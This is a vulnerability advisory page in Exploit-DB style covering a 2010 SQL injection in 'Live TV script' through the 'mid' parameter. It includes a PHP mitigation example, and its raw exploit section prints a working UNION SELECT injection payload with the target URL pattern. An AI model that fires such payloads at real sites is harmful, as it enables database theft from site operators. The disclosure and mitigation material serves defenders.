Vendor: Live TV script
By: R3d-D3v!L
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Live TV script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Live TV script suffers from remote SQL injection

Live TV script is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by sending a malicious SQL query to the server via the 'mid' parameter in the 'index.php' file. This query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the server.
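
The mitigation above, sketched as an added example; it is not code from Live TV script or from the advisory, whose source is not shown on this page. The `channels` table, its columns, the in-memory SQLite database and the function names are assumptions made so the example runs on its own; it pairs allow-list validation of `mid` with a parameterized query.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the script's database: the real schema is not
// shown in the advisory, so `channels` and its columns are assumptions.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE channels (id INTEGER PRIMARY KEY, name TEXT, stream TEXT, descr TEXT)');
    $db->exec("INSERT INTO channels VALUES (1, 'News', 'rtmp://example.invalid/news', 'constructed row')");
    return $db;
}

// Layer 1: allow-list validation. `mid` must be a positive decimal integer.
function parse_mid($raw): ?int {
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    // filter_var also rejects digit strings that overflow the platform integer.
    $mid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $mid === false ? null : $mid;
}

// Layer 2: parameterized query. Even a value that passed validation is bound
// as typed data, never concatenated into the SQL text.
function fetch_channel(PDO $db, $rawMid): ?array {
    $mid = parse_mid($rawMid);
    if ($mid === null) {
        return null; // caller should answer 400 and log the rejected value
    }
    $stmt = $db->prepare('SELECT id, name, stream, descr FROM channels WHERE id = :mid');
    $stmt->bindValue(':mid', $mid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = demo_db();
// Constructed inputs: a legitimate id, the UNION string quoted in the advisory
// (URL-decoded, as PHP would present it in $_GET['mid']), and two other bad values.
$inputs = ['1', '-666 union all select 1,@@version,3,4 from admin--', '1 OR 1=1', ''];
foreach ($inputs as $in) {
    $row = fetch_channel($db, $in);
    printf("%-55s => %s\n", var_export($in, true), $row ? $row['name'] : 'rejected / not found');
}
```

Validation alone depends on every code path remembering to call it; the bound parameter is what keeps `mid` out of the SQL grammar if a check is ever missed.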

Exploit-DB raw data:

[?] -------------------------{In The Name Of Allah The Merciful}----------------------
[?]
[~] Type: Live TV script suffers from remote SQL injection
[~] Vendor: livetvscript.com
[?] Software: Live TV script
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 03:55 am GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]----------------------{DEV!L'5 of SYST3M}------------------


[*] Err0r C0N50L3:


http://server/p47h/index.php?mid={EV!L EXPLO!T}

[~] {EV!L EXPLO!T}:

-666+union+all+select+1,@@version,3,4+from+admin--



N073:

REAL RED DEV!L W@S h3r3 LAMERZ

GAZA !N our hearts !




[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] special thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]special SupP0RT: MY M!ND ;) & ((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--JUPA-aNd-Devil ro0t : Goo Goo Cs Tiroo

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------